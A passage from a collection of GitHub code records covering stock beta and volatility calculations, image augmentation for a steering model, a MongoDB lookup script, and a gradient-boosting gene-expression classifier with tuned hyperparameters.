'cov', 'beta', 'sd', 'tr', 'cv'])\r\n df_out_y2 = pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n df_out_y3 = pd.DataFrame(columns=['ticker', 'cov', 'beta', 'sd', 'tr', 'cv'])\r\n\r\n i = 0 # This is for counting the for loop below.\r\n for row in reader: # Looping through stock files.\r\n ticker = row[0]\r\n file_url = \"Beta/outData/stocks/\" + ticker + \".csv\"\r\n df = pd.read_csv(file_url)\r\n\r\n # Calculating covariance of index return values and stock return values.\r\n cov_1_month = calcCov(today, last_1_month, df)\r\n cov_3_month = calcCov(today, last_3_month, df)\r\n cov_6_month = calcCov(today, last_6_month, df)\r\n cov_9_month = calcCov(today, last_9_month, df)\r\n cov_1_year = calcCov(today, last_1_year, df)\r\n cov_2_year = calcCov(today, last_2_year, df)\r\n cov_3_year = calcCov(today, last_3_year, df)\r\n\r\n # Calculating beta for stocks.\r\n beta_1_month = calcBeta(today, last_1_month, df, cov_1_month)\r\n beta_3_month = calcBeta(today, last_3_month, df, cov_3_month)\r\n beta_6_month = calcBeta(today, last_6_month, df, cov_6_month)\r\n beta_9_month = calcBeta(today, last_9_month, df, cov_9_month)\r\n beta_1_year = calcBeta(today, last_1_year, df, cov_1_year)\r\n beta_2_year = calcBeta(today, last_2_year, df, cov_2_year)\r\n beta_3_year = calcBeta(today, last_3_year, df, cov_3_year)\r\n\r\n # Calculating standard deviation for stocks.\r\n sd_1_month = calcSD(today, last_1_month, df)\r\n sd_3_month = calcSD(today, last_3_month, df)\r\n sd_6_month = calcSD(today, last_6_month, df)\r\n sd_9_month = calcSD(today, last_9_month, df)\r\n sd_1_year = calcSD(today, last_1_year, df)\r\n sd_2_year = calcSD(today, last_2_year, df)\r\n sd_3_year = calcSD(today, last_3_year, df)\r\n\r\n # Calculating total return value for stocks.\r\n tr_1_month = calcTotalReturn(today, last_1_month, df)\r\n tr_3_month = calcTotalReturn(today, last_3_month, df)\r\n tr_6_month = calcTotalReturn(today, last_6_month, df)\r\n tr_9_month = calcTotalReturn(today, last_9_month, df)\r\n tr_1_year = calcTotalReturn(today, last_1_year, df)\r\n tr_2_year = calcTotalReturn(today, last_2_year, df)\r\n tr_3_year = calcTotalReturn(today, last_3_year, df)\r\n\r\n # Calculating CV for stocks.\r\n cv_1_month = calcCV(today, last_1_month, df, sd_1_month, tr_1_month)\r\n cv_3_month = calcCV(today, last_3_month, df, sd_3_month, tr_3_month)\r\n cv_6_month = calcCV(today, last_6_month, df, sd_6_month, tr_6_month)\r\n cv_9_month = calcCV(today, last_9_month, df, sd_9_month, tr_9_month)\r\n cv_1_year = calcCV(today, last_1_year, df, sd_1_year, tr_1_year)\r\n cv_2_year = calcCV(today, last_2_year, df, sd_2_year, tr_2_year)\r\n cv_3_year = calcCV(today, last_3_year, df, sd_3_year, tr_3_year)\r\n\r\n df_out_m1.loc[i] = [ticker, cov_1_month, beta_1_month, sd_1_month, tr_1_month, cv_1_month]\r\n df_out_m3.loc[i] = [ticker, cov_3_month, beta_3_month, sd_3_month, tr_3_month, cv_3_month]\r\n df_out_m6.loc[i] = [ticker, cov_6_month, beta_6_month, sd_6_month, tr_6_month, cv_6_month]\r\n df_out_m9.loc[i] = [ticker, cov_9_month, beta_9_month, sd_9_month, tr_9_month, cv_9_month]\r\n df_out_y1.loc[i] = [ticker, cov_1_year, beta_1_year, sd_1_year, tr_1_year, cv_1_year]\r\n df_out_y2.loc[i] = [ticker, cov_2_year, beta_2_year, sd_2_year, tr_2_year, cv_2_year]\r\n df_out_y3.loc[i] = [ticker, cov_3_year, beta_3_year, sd_3_year, tr_3_year, cv_3_year]\r\n i += 1\r\n\r\n df_out_m1.to_csv(\"Beta/outData/m1.csv\", index=False, encoding='utf-8-sig')\r\n df_out_m3.to_csv(\"Beta/outData/m3.csv\", index=False, encoding='utf-8-sig')\r\n df_out_m6.to_csv(\"Beta/outData/m6.csv\", index=False, encoding='utf-8-sig')\r\n df_out_m9.to_csv(\"Beta/outData/m9.csv\", index=False, encoding='utf-8-sig')\r\n df_out_y1.to_csv(\"Beta/outData/y1.csv\", index=False, encoding='utf-8-sig')\r\n df_out_y2.to_csv(\"Beta/outData/y2.csv\", index=False, encoding='utf-8-sig')\r\n df_out_y3.to_csv(\"Beta/outData/y3.csv\", index=False, encoding='utf-8-sig')", "repo_name": "parsaakbari1209/analysis-table-for-tehran-stock-exchange", "sub_path": "Beta/outData/calcTableData.py", "file_name": "calcTableData.py", "file_ext": "py", "file_size_in_byte": 7045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.cov", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 24, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 40, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 41, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 41, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 41, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 42, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 42, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 42, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 43, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 43, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 43, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 44, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 44, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 44, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 45, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 45, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 45, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 46, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 46, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 46, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta.relativedelta", "line_number": 47, "usage_type": "call"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 47, "usage_type": "attribute"}, {"api_name": "dateutil.relativedelta", "line_number": 47, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 54, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 55, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "71464644649", "text": "import concurrent.futures\nimport cv2\nimport matplotlib.image as mpimg\nimport numpy as np\nimport os\n\nORIGINAL_IMAGE_HEIGHT, ORIGINAL_IMAGE_WIDTH = 160, 320\nIMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS = 66, 200, 3\nINPUT_SHAPE = (IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS)\n\nclass ImageLoader:\n def __init__(self, data_dir, image_paths):\n n_images = image_paths.shape[0]\n self.n_images = n_images\n\n print('Loading %d images from %s...' % (n_images, data_dir))\n\n self.center = np.empty([n_images, ORIGINAL_IMAGE_HEIGHT, ORIGINAL_IMAGE_WIDTH, IMAGE_CHANNELS], dtype=np.uint8)\n self.left = np.empty([n_images, ORIGINAL_IMAGE_HEIGHT, ORIGINAL_IMAGE_WIDTH, IMAGE_CHANNELS], dtype=np.uint8)\n self.right = np.empty([n_images, ORIGINAL_IMAGE_HEIGHT, ORIGINAL_IMAGE_WIDTH, IMAGE_CHANNELS], dtype=np.uint8)\n\n for idx, img in enumerate(image_paths):\n center, left, right = img\n self.center[idx] = self._load_image(data_dir, center)\n self.left[idx] = self._load_image(data_dir, left)\n self.right[idx] = self._load_image(data_dir, right)\n\n print('Loaded %d images from %s...' % (n_images, data_dir))\n\n def _load_image(self, data_dir, image_file):\n return mpimg.imread(os.path.join(data_dir, image_file))\n\n# preprocess an image\ndef crop(image):\n return image[60:-25, :]\n\ndef resize(image):\n return cv2.resize(image, (IMAGE_WIDTH, IMAGE_HEIGHT), cv2.INTER_AREA)\n\ndef rgb2yuv(image):\n return cv2.cvtColor(image, cv2.COLOR_RGB2YUV)\n\ndef preprocess(image):\n return rgb2yuv(resize(crop(image)))\n\n# augument the image\ndef choose_image(image_loader, idx, steering_angle):\n choice = np.random.choice(3)\n if choice == 0:\n return image_loader.left[idx], steering_angle + 0.2\n elif choice == 1:\n return image_loader.right[idx], steering_angle - 0.2\n return image_loader.center[idx], steering_angle\n\ndef random_flip(img):\n if np.random.rand() < 0.5:\n img = cv2.flip(img, 1)\n return img\n\ndef random_translate(img, range_x, range_y):\n trans_x = range_x * (np.random.rand() - 0.5)\n trans_y = range_y * (np.random.rand() - 0.5)\n trans_m = np.float32([[1, 0, trans_x],\n [0, 1, trans_y]])\n h, w = img.shape[:2]\n return cv2.warpAffine(img, trans_m, (w, h))\n\ndef random_brightness(img):\n hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n ratio = 1.0 + 0.2 * (np.random.rand() - 0.5)\n hsv[:, :, 2] = hsv[:, :, 2] * ratio\n return cv2.cvtColor(hsv, cv2.COLOR_HSV2RGB)\n\ndef augument(img, range_x=100, range_y=10):\n img = random_flip(img)\n img = random_brightness(img)\n img = random_translate(img, range_x, range_y)\n return img\n\ndef random_batch(n_images, batch_size):\n perm = np.random.permutation(n_images)\n i = 0\n\n while i < n_images:\n bs = np.min([batch_size, n_images - i])\n yield perm[i:(i + bs)]\n i += bs\n\ndef process_mini_batch(indexes, il, steering_angles, is_training):\n batch_size = indexes.shape[0]\n images = np.empty([batch_size, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS])\n steers = np.empty(batch_size)\n\n for k, j in enumerate(indexes):\n steering_angle = steering_angles[j]\n if is_training:\n image, steering_angle = choose_image(il, j, steering_angle)\n image = augument(image)\n else:\n image = il.center[j]\n images[k] = preprocess(image)\n steers[k] = steering_angle\n\n return images, steers\n\ndef batch_generator(data_dir, image_paths, steering_angles, batch_size, is_training):\n il = ImageLoader(data_dir, image_paths)\n\n images = np.empty([batch_size, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS])\n steers = np.empty(batch_size)\n\n num_workers = 8\n executor = concurrent.futures.ThreadPoolExecutor(max_workers=num_workers)\n\n while True:\n for indexes in random_batch(il.n_images, batch_size):\n fut = [ executor.submit(process_mini_batch, mb, il, steering_angles, is_training) for mb in np.array_split(indexes, num_workers) ]\n\n j = 0\n for f in concurrent.futures.as_completed(fut):\n try:\n img_batch, st_batch = f.result()\n except Exception as e:\n print('Caught an exception: ', e)\n else:\n sz = img_batch.shape[0]\n images[j:(j+sz)] = img_batch\n steers[j:(j+sz)] = st_batch\n j += sz\n yield images, steers\n\n", "repo_name": "khvorov/tf-learn", "sub_path": "sdc/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 4533, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.empty", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 20, "usage_type": "attribute"}, {"api_name": "matplotlib.image.imread", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.image", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 38, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2YUV", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 56, "usage_type": "attribute"}, {"api_name": "cv2.flip", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2HSV", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 70, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2RGB", "line_number": 72, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 81, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 110, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 113, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 113, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 113, "usage_type": "name"}, {"api_name": "numpy.array_split", "line_number": 117, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.as_completed", "line_number": 120, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 120, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 120, "usage_type": "name"}]}
+{"seq_id": "71567457768", "text": "#! /usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nModule: find.py\nCreated on Wed Sep 04 22:09:01 2013\n@author: gav\nDescription: Find records of jobs in mongodb\n\n\"\"\"\n### Imports\nfrom __future__ import print_function\n\nfrom pymongo import MongoClient\n### Logging ###\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\ndebug, info, error = logging.debug, logging.info, logging.error\n\n### Constants\nMONGO_ADDR = 'mongodb://tornado:27017/'\nMONGO_DB = 'bonaparte_log'\nMONGO_COLLECTION = 'message_atoms'\n### Classes\n\n### Functions ###\ndef filter_(ma):\n return {\n \"host\": ma[\"host\"],\n \"stage\": ma['q_stage'],\n \"time_recv\": ma[\"time_recv\"],\n \"time_sent\": ma[\"time_sent\"],\n }\n\ndef my_print(ma):\n tpl = \"host: {h}, sent: {ts}, recv: {tr}, stage: {s}\"\n rec = tpl.format(h=ma[\"host\"],\n tr=ma[\"time_recv\"].strftime(\"%H:%M:%S\"),\n ts=ma[\"time_sent\"].strftime(\"%H:%M:%S\"),\n s=ma[\"stage\"])\n print(rec)\n\n### Tests\n\nif __name__ == \"__main__\":\n\n # setup\n client = MongoClient(MONGO_ADDR)\n db = client.bonaparte_log\n atoms = db.bonaparte_log\n\n #validate stem\n# stem = \"DIESEL_XENA_Q1_019\"\n stem = \"DIESEL_XENA_Q3_074\"\n query = {\n \"stem\": stem\n }\n # return elements with stem\n for job in atoms.find(query).sort(\"time_recv\"):\n print(job)\n print()\n# display_atom = filter_(job)\n# my_print(display_atom)\n\n\n print(\"Done __main__\")\n\n", "repo_name": "gjcoombes/joseph", "sub_path": "modules/winfates/find.py", "file_name": "find.py", "file_ext": "py", "file_size_in_byte": 1485, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 16, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "34519983151", "text": "import pandas as pd\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport time\nfrom sklearn.pipeline import make_pipeline\nfrom skrebate import ReliefF\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import cross_val_score, train_test_split, LeaveOneOut, KFold, StratifiedKFold\nfrom sklearn import preprocessing\nfrom sklearn import svm\nfrom sklearn.svm import LinearSVC\nfrom sklearn.metrics import roc_auc_score,confusion_matrix,roc_curve,auc\nimport matplotlib.pyplot as plt\n# # # #\ndef loadDataset(filename, train_X=[], train_Y=[]):\n # filename是划分训练集和测试集文件夹中的训练集train.txt\n f = open(filename)\n lines = f.readlines()\n\n dataMat = []\n N = len(lines)\n for i in range(0, N):\n data = lines[i].strip().split(\",\")\n dataMat.append(data)\n N_i = len(dataMat)\n N_j = len(dataMat[0])\n\n for i in range(0, N_i):\n Y = dataMat[i][N_j-1] #标签\n if (Y == '1'): # 正常\n train_Y.append(1)\n else:\n train_Y.append(2)\n\n for index in range(0, len(dataMat[i])):\n dataMat[i][index] = float(dataMat[i][index])\n\n lines1=[]\n for j in range(0,N_j-1):\n lines1.append(float(dataMat[i][j]))\n train_X.append(lines1) #要去掉最后一列label\n\ndef recover(filename,filename1,filename2):\n f = open(filename)\n lines = f.readlines() #top60特征\n #print(lines)\n\n # print(len(lines))\n f1 = open(filename1)\n lines1 = f1.readlines() #原始数据,文件为feature.csv\n #print(lines1)\n dataMat = [] #存放基因名\n dataMat1 = []\n for i in range(0, len(lines)):\n data = lines[i].strip().split('\\t')\n\n dataMat.append(data)\n # print(dataMat[0])\n\n f2 = open(filename2, 'w')\n #f2.write(lines[0]) #将基因名写入f2\n\n for j in range(0, len(lines1)): #train.csv\n data1 = lines1[j].strip().split(',')\n dataMat1.append(data1)\n\n #print(dataMat1[0][1])\n\n N_i = len(dataMat1) #行数\n N_j = len(dataMat1[0]) #列数\n\n for i in range(0,N_i) :\n #temp = dataMat1[i][0]\n # #print(temp)\n #print(i+1)\n for k in range(0,len(dataMat)):\n for j in range(0, N_j):\n if dataMat[k][0] == dataMat1[0][j]:\n #print(dataMat[k][0])\n f2.write(dataMat1[i][j])\n f2.write(',')\n f2.write(dataMat1[i][N_j-1]) #将标签写进去\n f2.write('\\n')\n f2.close()\n\n\n#\n########################将训练集、测试集、验证集 按照GBDT——feature 做特征选择\n# fileDir = r\"C:\\Users\\JQ\\experiment\\data\\BREA\"\n# filepath = fileDir + \"\\learn_test\"\n# filename = fileDir +'\\\\GBDT_R_features.txt'\n# filename1 = filepath +'\\\\train.csv'\n# filename2 = filepath +'\\\\final_R_train.csv'\n# filename3 = filepath +'\\\\valid.csv'\n# filename4 = filepath +'\\\\final_R_valid.csv'\n# #\n# Dir = r\"C:\\Users\\JQ\\experiment\\data\\BREA\\learn_test\"\n# file_test = Dir +\"\\\\test.csv\"\n# filename_test = Dir +\"\\\\final_R_test.csv\"\n# #\n# recover(filename,file_test,filename_test) #534个样本恢复\n# recover(filename,filename1,filename2)\n# recover(filename,filename3,filename4)\n\n\ndef balance(y_pred,y_valid,y_pred_t,y_test):\n tumor = 0\n normal = 0\n tumor_sum = 0\n normal_sum = 0\n for i in range(0, len(y_valid)):\n if y_valid[i] == 1:\n tumor_sum += 1\n else:\n normal_sum += 1\n\n for i in range(0, len(y_pred)):\n\n if y_valid[i] == 1 & y_pred[i] == y_valid[i]:\n tumor += 1\n if y_valid[i] == 2 & y_pred[i] == y_valid[i]:\n normal += 1\n tumor_ratio = tumor / tumor_sum #####癌症样本准确率\n normal_ratio = normal / normal_sum ###正常样本准确率\n\n tumor_t = 0\n normal_t = 0\n tumor_t_sum = 0\n normal_t_sum = 0\n for i in range(0, len(y_test)):\n if y_test[i] == 1:\n tumor_t_sum += 1\n else:\n normal_t_sum += 1\n\n for i in range(0, len(y_pred_t)):\n\n if y_test[i] == 1 & y_pred_t[i] == y_test[i]:\n tumor_t += 1\n if y_test[i] == 2 & y_pred_t[i] == y_test[i]:\n normal_t += 1\n tumor_t_ratio = tumor_t / tumor_t_sum #####癌症样本准确率\n normal_t_ratio = normal_t / normal_t_sum ###正常样本准确率\n\n balance_acc_test = (tumor_t_ratio * tumor_ratio + normal_t_ratio * normal_ratio) /2\n\n return balance_acc_test\n\ndef metrics(confusion):\n acc= (confusion[0][0]+confusion[1][1])/(confusion[0][0]+confusion[0][1]+confusion[1][0]+confusion[1][1])\n ses = confusion[0][0] /(confusion[0][0]+confusion[0][1])\n spc = confusion[1][1]/(confusion[1][1]+confusion[1][0])\n prc = confusion[0][0]/(confusion[0][0]+confusion[1][0])\n f1 = 2*confusion[0][0]/(2*confusion[0][0]+confusion[1][0]+confusion[0][1])\n\n # print(\"acc:\"+str(acc))\n # print(\"sec:\" +str(ses))\n # print(\"spc:\" +str(spc))\n # print(\"prc:\" +str(prc))\n # print(\"f1:\"+ str(f1))\n return acc,ses,spc,prc,f1\n\n\ngbdt_acc = []\ngbdt_b_acc =[]\ngbdt_ses =[]\ngbdt_spc=[]\ngbdt_prc=[]\ngbdt_f1 =[]\ngbdt_auc =[]\n\n\nfor i in range(1,11):\n filename = r\"C:\\Users\\JQ\\experiment\\data\\BREA\\split\"\n data = pd.read_csv(filename + \"\\\\\" + str(i) + \"\\\\train.csv\") # 全体特征\n x_columns = []\n for x in data.columns:\n if x not in ['label']:\n x_columns.append(x)\n X = data[x_columns]\n y = data['label']\n x_train = data[x_columns]\n y_train = data['label']\n\n data = pd.read_csv(filename + \"\\\\\" + str(i) + \"\\\\valid.csv\")\n x_columns = []\n for x in data.columns:\n if x not in ['label']:\n x_columns.append(x)\n x_valid = data[x_columns]\n y_valid = data['label']\n\n data = pd.read_csv(filename + \"\\\\\" + str(i) + \"\\\\test.csv\")\n x_columns = []\n for x in data.columns:\n if x not in ['label']:\n x_columns.append(x)\n x_test = data[x_columns]\n y_test = data['label']\n\n # from sklearn import svm\n # clf_svm = svm.SVC(kernel='linear')\n # clf_svm.fit(x_train,y_train)\n # y_svm_pred = clf_svm.predict(x_valid)\n # y_svm_pred_t = clf_svm.predict(x_test)\n # balance1 = balance(y_svm_pred,y_valid,y_svm_pred_t,y_test)\n # auc_svm = roc_auc_score(y_test,y_svm_pred_t)\n # svm_confusion = confusion_matrix(y_test,y_svm_pred_t)\n # print(\"balance SVM:\" + str(balance1))\n # print(\"AUC_SVM:\"+str(auc_svm))\n # print(\"SVM confusion:\")\n # metrics(svm_confusion)\n #\n # from sklearn.ensemble import RandomForestClassifier\n #\n # RF = RandomForestClassifier(n_estimators=20)\n # RF.fit(x_train,y_train)\n # y_RF_pred = RF.predict(x_valid)\n # y_RF_pred_t = RF.predict(x_test)\n # balance2 = balance(y_RF_pred,y_valid,y_RF_pred_t,y_test)\n # auc_RF = roc_auc_score(y_test,y_RF_pred_t)\n # RF_confusion = confusion_matrix(y_test,y_RF_pred_t)\n # print(\"balance RF:\" + str(balance2))\n # print(\"AUC_RF:\"+str(auc_RF))\n # print(\"RF confusion:\")\n # metrics(RF_confusion)\n #\n # from sklearn.ensemble import RandomForestClassifier\n #\n # # from sklearn.cross_validation import cross_val_score, ShuffleSplit\n # RF_2 = RandomForestClassifier(n_estimators=1000)\n # RF_2.fit(x_train, y_train)\n # y_RF_2_pred =RF_2.predict(x_valid)\n # y_RF_2_pred_t = RF_2.predict(x_test)\n # balance3 = balance(y_RF_2_pred,y_valid,y_RF_2_pred_t,y_test)\n # auc_RF2 =roc_auc_score(y_test,y_RF_2_pred_t)\n # RF2_confusion = confusion_matrix(y_test,y_RF_2_pred_t)\n # print(\"balance RF2:\" + str(balance3))\n # print(\"AUC_RF2:\"+str(auc_RF2))\n # print(\"RF2 confusion:\")\n # metrics(RF2_confusion)\n #\n # from sklearn import tree\n #\n # clf_tree = tree.DecisionTreeClassifier(criterion='entropy')\n # clf_tree = clf_tree.fit(x_train, y_train)\n # y_TREE_pred = clf_tree.predict(x_valid)\n # y_TREE_pred_t = clf_tree.predict(x_test)\n # balance4 = balance(y_TREE_pred,y_valid,y_TREE_pred_t,y_test)\n # auc_tree =roc_auc_score(y_test,y_TREE_pred_t)\n # tree_confusion = confusion_matrix(y_test,y_TREE_pred_t)\n # print(\"balance TREE:\" + str(balance4))\n # print(\"AUC_tree:\"+str(auc_tree))\n # print(\"TREE confusion:\")\n # metrics(tree_confusion)\n #\n # # from sklearn import tree\n # #\n # # clf_tree1 = tree.DecisionTreeClassifier() #默认基尼系数\n # # clf_tree1 = clf_tree.fit(x_train, y_train)\n #\n # from sklearn import neighbors\n #\n # clf_knn = neighbors.KNeighborsClassifier()\n # clf_knn.fit(x_train,y_train)\n # y_knn_pred = clf_knn.predict(x_valid)\n # y_knn_pred_t = clf_knn.predict(x_test)\n # balance5 = balance(y_knn_pred,y_valid,y_knn_pred_t,y_test)\n # auc_knn =roc_auc_score(y_test,y_knn_pred_t)\n # knn_confusion = confusion_matrix(y_test,y_knn_pred_t)\n # print(\"balance KNN:\" + str(balance5))\n # print(\"AUC_knn:\"+str(auc_knn))\n # print(\"knn confusion:\")\n # metrics(knn_confusion)\n\n from sklearn.ensemble import GradientBoostingClassifier\n\n gbr = GradientBoostingClassifier(\n # n_estimators=74,\n # max_depth=19,\n # min_samples_leaf=36,\n # min_samples_split=67,\n # learning_rate=0.33653933039595074, #####0.8165,\n # subsample=0.96259334356605,\n # random_state=10\n # )\n\n # n_estimators=127,\n # max_depth=9,\n # min_samples_leaf=17,\n # min_samples_split=20,\n # learning_rate= 0.1889, #####0.8165,\n # subsample=0.8139,\n # random_state=10\n # )\n ########11111111111111111111111111111111111111BO##########################################\n # n_estimators = 235,\n # max_depth = 19,\n # min_samples_leaf = 46,\n # min_samples_split = 58,\n # learning_rate = 0.04838582279938517, #####0.8165,\n # subsample = 0.9891359053949287,\n # random_state = 10\n # )\n ###########11111111111111111111111RD##########################\n # n_estimators = 271,\n # max_depth = 23,\n # min_samples_leaf = 53,\n # min_samples_split = 55,\n # learning_rate = 0.1594398172778165, #####0.8165,\n # subsample = 0.8231493992953516,\n # random_state = 10\n # )\n ##########222222222222222222BO##################最优\n n_estimators = 374,\n max_depth = 29,\n min_samples_leaf = 88,\n min_samples_split = 12,\n learning_rate =0.5373220899834616, #####0.8165,\n subsample = 0.846203750084136,\n random_state = 10\n )\n ###############2222222222222RD\n # n_estimators = 67,\n # max_depth = 20,\n # min_samples_leaf = 93,\n # min_samples_split = 35,\n # learning_rate = 0.030286120485679326, #####0.8165,\n # subsample = 0.8328799036070788,\n # random_state = 10\n # )\n #############################333333333333333BO\n # n_estimators = 358,\n # max_depth = 23,\n # min_samples_leaf = 52,\n # min_samples_split = 70,\n # learning_rate = 0.2797941215670739, #####0.8165,\n # subsample = 0.9321368111903375,\n # random_state = 10\n # )\n ##################################333333RD\n # n_estimators=82,\n # max_depth=42,\n # min_samples_leaf=56,\n # min_samples_split=64,\n # learning_rate=0.14537979952691704, #####0.8165,\n # subsample=0.9760518597431092,\n # random_state=10\n # )\n\n#####################444444444BO\n # n_estimators=412,\n # max_depth=9,\n # min_samples_leaf=60,\n # min_samples_split=72,\n # learning_rate=0.20479554131615968, #####0.8165,\n # subsample=0.9958775857920726,\n # random_state=10\n # )\n######################44444444RD\n# n_estimators = 416,\n# max_depth = 12,\n# min_samples_leaf = 32,\n# min_samples_split = 44,\n# learning_rate = 0.27828778773713747, #####0.8165,\n# subsample = 0.9480390573398242,\n# random_state = 10\n# )\n\n#############################5555555RD\n # n_estimators = 237,\n # max_depth = 34,\n # min_samples_leaf = 86,\n # min_samples_split = 22,\n # learning_rate =0.6443744115487993, #####0.8165,\n # subsample = 0.9105421033225315,\n # random_state = 10\n # )\n#########################555555BO\n # n_estimators = 474,\n # max_depth = 28,\n # min_samples_leaf = 87,\n # min_samples_split = 89,\n # learning_rate =0.027136389286726015, #####0.8165,\n # subsample = 0.8719086882161583,\n # random_state = 10\n # )\n####################666666RD 最优\n # n_estimators = 130,\n # max_depth = 23,\n # min_samples_leaf = 94,\n # min_samples_split = 54,\n # learning_rate =0.0829094998990422, #####0.8165,\n # subsample = 0.8176170806599637,\n # random_state = 10\n # )\n#####################666666BO\n # n_estimators = 302,\n # max_depth = 28,\n # 